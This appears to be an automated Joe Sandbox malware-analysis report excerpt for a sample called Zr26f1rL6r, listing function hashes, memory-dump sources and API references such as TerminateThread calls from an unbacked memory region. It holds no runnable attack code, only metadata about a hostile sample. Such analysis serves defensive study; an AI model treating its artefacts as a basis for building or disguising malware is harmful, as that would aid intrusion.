Instruction ID: df2a6f06f47b5440d23ebb4a8352bbee8500a6dd9701dcc9f1ec442442e79f4d
Opcode Fuzzy Hash: 4b6d9129e6853d94f6aeec4a048ec9db0758e1301701be173fdff541fbfa78f3
Instruction Fuzzy Hash: FB90023120150802D5106259491474F505547D0712F91C559A1254D15DC63588527971

Uniqueness

Uniqueness Score: -1.00%

Function 1E902ED0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E902EDA

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ce25a412911b0fb7420211eb167891969cb220d0501d998db5207e5cc99bc0a9
Instruction ID: 01740e23ab4c712f6a26524426d1e62653b6c85f8ef57554670ec659d5d08cf7
Opcode Fuzzy Hash: ce25a412911b0fb7420211eb167891969cb220d0501d998db5207e5cc99bc0a9
Instruction Fuzzy Hash: 699002216011044245507269894494A90556BE1621791C669A0A88D10DC56988667A65

Uniqueness

Uniqueness Score: -1.00%

Function 1E902E50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E902E5A

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e40983c2423c71c9180b8a0764bf2f306d9ba3478c95af06f18227a92dc9397c
Instruction ID: 7ff54f2b0d25bd59729645c060735ee074f0b642b94aa11e523632924468a326
Opcode Fuzzy Hash: e40983c2423c71c9180b8a0764bf2f306d9ba3478c95af06f18227a92dc9397c
Instruction Fuzzy Hash: B090026134110842D51062594514B4A505587E1711F91C55DE1154D14DC629CC537526

Uniqueness

Uniqueness Score: -1.00%

Function 1E902F00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E902F0A

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7c8f1bcf8a010f74ef3e2f58c8caa1c67c49e5bb21f488212d98a3216891a331
Instruction ID: 5a36a4b98acb87e65ff3adc788b4d534c301d3c8ad6d56604e06802720e503f0
Opcode Fuzzy Hash: 7c8f1bcf8a010f74ef3e2f58c8caa1c67c49e5bb21f488212d98a3216891a331
Instruction Fuzzy Hash: 1490022121190442D61066694D14B4B505547D0713F91C65DA0244D14CC92588627921

Uniqueness

Uniqueness Score: -1.00%

Function 1E902CF0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E902CFA

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 649dcaf44a4e9278e9a92cf1da28015b6955ed0e2c936c606932bac073034a59
Instruction ID: 2b788238a01b64209e2619f729f66881218761622458159ec57413de1edee151
Opcode Fuzzy Hash: 649dcaf44a4e9278e9a92cf1da28015b6955ed0e2c936c606932bac073034a59
Instruction Fuzzy Hash: AE900221242145525955B259450454B905657E06517D1C55AA1504D10CC5369857FA21

Uniqueness

Uniqueness Score: -1.00%

Function 1E902C30, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E902C3A

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a940577e60093ad22253a6099b4bbf5f46f301596ee0199ea363d9b4b45d4948
Instruction ID: e4b9edc0812e3943fc27f21b416e28e2a6e093e536a49b415bbb339391d2f179
Opcode Fuzzy Hash: a940577e60093ad22253a6099b4bbf5f46f301596ee0199ea363d9b4b45d4948
Instruction Fuzzy Hash: 5490022921310402D5907259550864E505547D1612FD1D95DA0105D18CC925886A7721

Uniqueness

Uniqueness Score: -1.00%

Function 1E902C50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E902C5A

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b47efeae2d9beb3a06882591b79d4fae8356faf9123fb96d9fa7584dbe87a9b4
Instruction ID: eb2566ca242d86650a2527bc8a7714f82fa5e0e42afbb0acf4452adae397d1d3
Opcode Fuzzy Hash: b47efeae2d9beb3a06882591b79d4fae8356faf9123fb96d9fa7584dbe87a9b4
Instruction Fuzzy Hash: 4890022130110403D5507259551864A905597E1711F91D559E0504D14CD92588577622

Uniqueness

Uniqueness Score: -1.00%

Function 1E902DA0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E902DAA

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1b8fc45c0f62beb359c25b00d2574ba9a2adb340cbf53b3890ea06e6f54c15eb
Instruction ID: be0e0ee3945f6ffad85b8f006e4461f4c66cc19196e6efc37680bedb4dbd5511
Opcode Fuzzy Hash: 1b8fc45c0f62beb359c25b00d2574ba9a2adb340cbf53b3890ea06e6f54c15eb
Instruction Fuzzy Hash: 4B90022160110902D5117259450465A505A47D0651FD1C56AA1114D15ECA358993B531

Uniqueness

Uniqueness Score: -1.00%

Function 1E902DC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E902DCA

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9c92fc59df171b8daaf7d0c75cf0879bbf17c7e8b8cf08ad367588f83891a205
Instruction ID: 82071d9ecb224294e14db9cfc2bc137e24ecea03ebe5fa02daf4b2793c897821
Opcode Fuzzy Hash: 9c92fc59df171b8daaf7d0c75cf0879bbf17c7e8b8cf08ad367588f83891a205
Instruction Fuzzy Hash: D390027120110802D5507259450478A505547D0711F91C559A5154D14EC6698DD67A65

Uniqueness

Uniqueness Score: -1.00%

Function 1E902D10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E902D1A

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f9a0e864c01a843e734c02676f6a7942959ca3ca57211b2c8af4eca4a408756
Instruction ID: f8cb7591a5ab58a61b94a9f72a1f7849d78ccf031ad41445391f6b2e006cdae4
Opcode Fuzzy Hash: 3f9a0e864c01a843e734c02676f6a7942959ca3ca57211b2c8af4eca4a408756
Instruction Fuzzy Hash: 8B90023120110813D5216259460474B505947D0651FD1C95AA0514D18DD6668953B521

Uniqueness

Uniqueness Score: -1.00%

Function 1E902B90, Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1E902B9A

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cbc87587ef6fdb9c1994c872ea9dbba703dcbf40387c7df1962839f1596f5b85
Instruction ID: 9ff7f6999d49e28d8386e4f957bd37ddd0ff3f8d9e085fdb0753750b1ed47321
Opcode Fuzzy Hash: cbc87587ef6fdb9c1994c872ea9dbba703dcbf40387c7df1962839f1596f5b85
Instruction Fuzzy Hash: 2A90023120118C02D5206259850478E505547D0711F95C959A4514E18DC6A588927521

Uniqueness

Uniqueness Score: -1.00%

Function 1E902BC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E902BCA

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9ac16548e836f13d5889208c10b8bbddc87bfcc6d13113ef88f4d36e2739d4fa
Instruction ID: 4e10d46e85ee2b3fa0ef2ced33cdb8ffa5b7ece68ff1210d71e304f4987c7162
Opcode Fuzzy Hash: 9ac16548e836f13d5889208c10b8bbddc87bfcc6d13113ef88f4d36e2739d4fa
Instruction Fuzzy Hash: B390023120110802D5106699550868A505547E0711F91D559A5114D15EC67588927531

Uniqueness

Uniqueness Score: -1.00%

Function 1E902B10, Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1E902B1A

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f4c4a943680d92242cd4cb896e40895d40fe338452a086c80777512566ae9ecc
Instruction ID: d33fa5c37a326be5c19dd8b551659233c03c720797e22f55358aa4d7ab6fc8dd
Opcode Fuzzy Hash: f4c4a943680d92242cd4cb896e40895d40fe338452a086c80777512566ae9ecc
Instruction Fuzzy Hash: CA90023120110C02D5907259450468E505547D1711FD1C55DA0115E14DCA258A5A7BA1

Uniqueness

Uniqueness Score: -1.00%

Function 1E9029F0, Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1E9029FA

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c71b4aad30ced3dc59c8f37319a0e0cd194834e4ebefc08198b8e9a35211454d
Instruction ID: 4ba9be49c5e33344a572c3537d658b19b1e43256dff38e4e59a86ba1a3c8b056
Opcode Fuzzy Hash: c71b4aad30ced3dc59c8f37319a0e0cd194834e4ebefc08198b8e9a35211454d
Instruction Fuzzy Hash: FE900225211104030515A659070454B509647D5761391C569F1105D10CD63188627521

Uniqueness

Uniqueness Score: -1.00%

Function 1E9034E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E9034EA

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c5b57f390ff2f98210ecfe177ca7e8d656d1977e797501b417f4bb8d8dda1d34
Instruction ID: db2c4248d5404f79a7d1b4065e89b9d1098c439bb24d606e8c7f03264c7343c9
Opcode Fuzzy Hash: c5b57f390ff2f98210ecfe177ca7e8d656d1977e797501b417f4bb8d8dda1d34
Instruction Fuzzy Hash: 9A90023160520802D5106259461474A605547D0611FA1C959A0514D28DC7A5895279A2

Uniqueness

Uniqueness Score: -1.00%

Function 005734B2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 84
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32(8D6E7AD5,5C7784AB), ref: 00573463

Strings

E, xrefs: 00573453

Memory Dump Source

Source File: 0000000A.00000002.47938849915.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_573000_Zr26f1rL6r.jbxd

Similarity

API ID: TerminateThread
String ID: E
API String ID: 1852365436-3568589458
Opcode ID: 63d5c529f23e53e931f4f2f2cf9a2ebbdab40d1d37f1ddddca4661f2912cd43b
Instruction ID: e06e5f0cc90130f863966da052ae868b359883ca75b051dd20f79d12ad0fa1be
Opcode Fuzzy Hash: 63d5c529f23e53e931f4f2f2cf9a2ebbdab40d1d37f1ddddca4661f2912cd43b
Instruction Fuzzy Hash: A821E434604703DFDF288A24E494B713B92BF61330F59C669D8994B1B1C7B5DAC5FA12

Uniqueness

Uniqueness Score: -1.00%

Function 0057333D, Relevance: 1.7, APIs: 1, Instructions: 184
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32(8D6E7AD5,5C7784AB), ref: 00573463

Memory Dump Source

Source File: 0000000A.00000002.47938849915.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_573000_Zr26f1rL6r.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 125437f74862e5e28ab0772b533dd6d3f30904ea1bf012cafa73c3a7be8dc623
Instruction ID: 81e88b84a1b3d38dd1934b66176d655dac27a842423d0ee6ba4a77e8f8263f2d
Opcode Fuzzy Hash: 125437f74862e5e28ab0772b533dd6d3f30904ea1bf012cafa73c3a7be8dc623
Instruction Fuzzy Hash: AC4147746043029FDF288A24D5F47FA3BA2BF51360F68C46ADC898B261D775C985E612

Uniqueness

Uniqueness Score: -1.00%

Function 005733D6, Relevance: 1.6, APIs: 1, Instructions: 129
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32(8D6E7AD5,5C7784AB), ref: 00573463

Memory Dump Source

Source File: 0000000A.00000002.47938849915.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_573000_Zr26f1rL6r.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: b3c4b9811dfd1512c561d12559520c044dd10e5bd42b9ee0975b3a363486aa53
Instruction ID: 1f2c1d87d4b2014dc722f200a29d411e7eba24aa5dfa2799d0b99ea94f146659
Opcode Fuzzy Hash: b3c4b9811dfd1512c561d12559520c044dd10e5bd42b9ee0975b3a363486aa53
Instruction Fuzzy Hash: 3E410630604743DFDF248A24E4E47A53BA2BF51320F58C56AD8898B2B1C7758A85E712

Uniqueness

Uniqueness Score: -1.00%

Function 005733E2, Relevance: 1.6, APIs: 1, Instructions: 123
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32(8D6E7AD5,5C7784AB), ref: 00573463

Memory Dump Source

Source File: 0000000A.00000002.47938849915.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_573000_Zr26f1rL6r.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 61ad056e913c5e7134c1f6e3c7f34bfeb502a26143b022ac41dc82b3c98f9414
Instruction ID: 171d67efcfd1c18b1442dce96417befe3a6b5f09e9eb105c31319bc25a22f3b6
Opcode Fuzzy Hash: 61ad056e913c5e7134c1f6e3c7f34bfeb502a26143b022ac41dc82b3c98f9414
Instruction Fuzzy Hash: 3A410674604743DFDF248A24E8E47E53BA2BF51320F58C56AD8898B2B2C7758A85E712

Uniqueness

Uniqueness Score: -1.00%

Function 005733EE, Relevance: 1.6, APIs: 1, Instructions: 118
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32(8D6E7AD5,5C7784AB), ref: 00573463

Memory Dump Source

Source File: 0000000A.00000002.47938849915.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_573000_Zr26f1rL6r.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 6546bd2b17dc53c65de12f6bd8f5f24a3b2dcc47d6e6e1e7e90597dc7f786622
Instruction ID: 25f29b0cdc27949813feb2ba1fe3e18bf9372954b0356c91f0d9a1cda50174f0
Opcode Fuzzy Hash: 6546bd2b17dc53c65de12f6bd8f5f24a3b2dcc47d6e6e1e7e90597dc7f786622
Instruction Fuzzy Hash: 89410530604703DFDF288A24E4E47E53B927F51320F58C56AD88D8B2B1C7758A85E612

Uniqueness

Uniqueness Score: -1.00%

Function 00573388, Relevance: 1.6, APIs: 1, Instructions: 117
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32(8D6E7AD5,5C7784AB), ref: 00573463

Memory Dump Source

Source File: 0000000A.00000002.47938849915.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_573000_Zr26f1rL6r.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 78171d6344f409d0b688c5e62183191793c4e89cb09b12b0817efa050e77702a
Instruction ID: b28c300884c0857b334c3795f035475b6de42a873c0ef5697d0130467c8e6706
Opcode Fuzzy Hash: 78171d6344f409d0b688c5e62183191793c4e89cb09b12b0817efa050e77702a
Instruction Fuzzy Hash: DF411630604707DFDF388E24E4E47E53BA2BF51360F68C46AD88D4B2B5C7758A85EA11

Uniqueness

Uniqueness Score: -1.00%

Function 00573406, Relevance: 1.6, APIs: 1, Instructions: 113
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32(8D6E7AD5,5C7784AB), ref: 00573463

Memory Dump Source

Source File: 0000000A.00000002.47938849915.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_573000_Zr26f1rL6r.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: a1ff5e52645c960b16ee0a9ca3ca655f4cb11f053120e37012fe301f9dd075e5
Instruction ID: 062d737e1cad28337dd41ab295fa52f30df6332ed084b50bbb462fed92827bb3
Opcode Fuzzy Hash: a1ff5e52645c960b16ee0a9ca3ca655f4cb11f053120e37012fe301f9dd075e5
Instruction Fuzzy Hash: A3311530604703DFDF288A24E4E47A53B927F61330F68C56AD88D8B2B1C775DA85E602

Uniqueness

Uniqueness Score: -1.00%

Function 00573412, Relevance: 1.6, APIs: 1, Instructions: 108
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32(8D6E7AD5,5C7784AB), ref: 00573463

Memory Dump Source

Source File: 0000000A.00000002.47938849915.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_573000_Zr26f1rL6r.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: be6cd48f64895fb72b5b8cbc0af970b75381a7680b2e0b5917ba3e732d55ea7c
Instruction ID: 2d62a514b1bf428d94753223b153ea3e1b4991c63798305a7d9ad45485d87db8
Opcode Fuzzy Hash: be6cd48f64895fb72b5b8cbc0af970b75381a7680b2e0b5917ba3e732d55ea7c
Instruction Fuzzy Hash: 35312834604703DFDF288A24E4E47B53B927F11330F58C56AC8898B2B5CBB59AC5F612

Uniqueness

Uniqueness Score: -1.00%

Function 0057349A, Relevance: 1.6, APIs: 1, Instructions: 90
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32(8D6E7AD5,5C7784AB), ref: 00573463

Memory Dump Source

Source File: 0000000A.00000002.47938849915.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_573000_Zr26f1rL6r.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 1c24800eede04b719aec2b2ecba1c30bf5f358b382f44212fdf96ca442d5a270
Instruction ID: 23c92cd02286c00be9eb3ed1bd3ff85660d5c883933e8203284458367a29ef6b
Opcode Fuzzy Hash: 1c24800eede04b719aec2b2ecba1c30bf5f358b382f44212fdf96ca442d5a270
Instruction Fuzzy Hash: 3B21F734600703DFDF288A54E4A47B13B927F61330F58C6A9D8494B2B5C7B5DAC5FA02

Uniqueness

Uniqueness Score: -1.00%

Function 005734A6, Relevance: 1.6, APIs: 1, Instructions: 86
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32(8D6E7AD5,5C7784AB), ref: 00573463

Memory Dump Source

Source File: 0000000A.00000002.47938849915.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_573000_Zr26f1rL6r.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 39a6760cc7d4d8892dd3c7a2f0646666962e25ef3eb500e301e9c69426d3103b
Instruction ID: f33f86f3c71a3cb35021e993f4535f8186441daa43e4a19da51a3a379e37973a
Opcode Fuzzy Hash: 39a6760cc7d4d8892dd3c7a2f0646666962e25ef3eb500e301e9c69426d3103b
Instruction Fuzzy Hash: D721E634600703DFDF288A14E4A47753B927F61330F69C669D8894B1B5C7B5DAC5FA12

Uniqueness

Uniqueness Score: -1.00%

Function 005734BE, Relevance: 1.6, APIs: 1, Instructions: 81
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32(8D6E7AD5,5C7784AB), ref: 00573463

Memory Dump Source

Source File: 0000000A.00000002.47938849915.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_573000_Zr26f1rL6r.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: b0989963749050af7da597dab5a4501b16fe4c8859b8752bb32cf4986257bee9
Instruction ID: 745370d4b4866394ed8d46c72abdf14a73998ebc1cc2391fe8a50cc6eba4c1c6
Opcode Fuzzy Hash: b0989963749050af7da597dab5a4501b16fe4c8859b8752bb32cf4986257bee9
Instruction Fuzzy Hash: 6C21D324604703DFDB298A24E4A47713B927F61330F59C6A9C8894B1B2C7B5DAC5FA12

Uniqueness

Uniqueness Score: -1.00%

Function 1E902B2A, Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1E902B44

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 591ecb46f3b696bbd7fc92c41e540128dfed4d8423c03c3ffdae074bc44e496d
Instruction ID: ef60feb8b853f9cd6757ad96f070d91511f355abfcdc48318bf9987e0c47b71b
Opcode Fuzzy Hash: 591ecb46f3b696bbd7fc92c41e540128dfed4d8423c03c3ffdae074bc44e496d
Instruction Fuzzy Hash: 06B02B31C010C5C5D601D720070870B790827C0B00F61C19AD1020E40F4338C081F531

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1E96FDF4, Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E96FE28

Strings

About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 1E970053
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 1E97026A
HEAP[%wZ]: , xrefs: 1E96FF19, 1E970028, 1E970150, 1E9701F5, 1E97024C
Just reallocated block at %p to %Ix bytes, xrefs: 1E970171
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 1E97021F
RtlReAllocateHeap, xrefs: 1E96FE3F, 1E96FEE2
About to reallocate block at %p to %Ix bytes, xrefs: 1E96FF3A
HEAP: , xrefs: 1E96FF26, 1E970035, 1E97015D, 1E970202, 1E970259

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 3446177414-1700792311
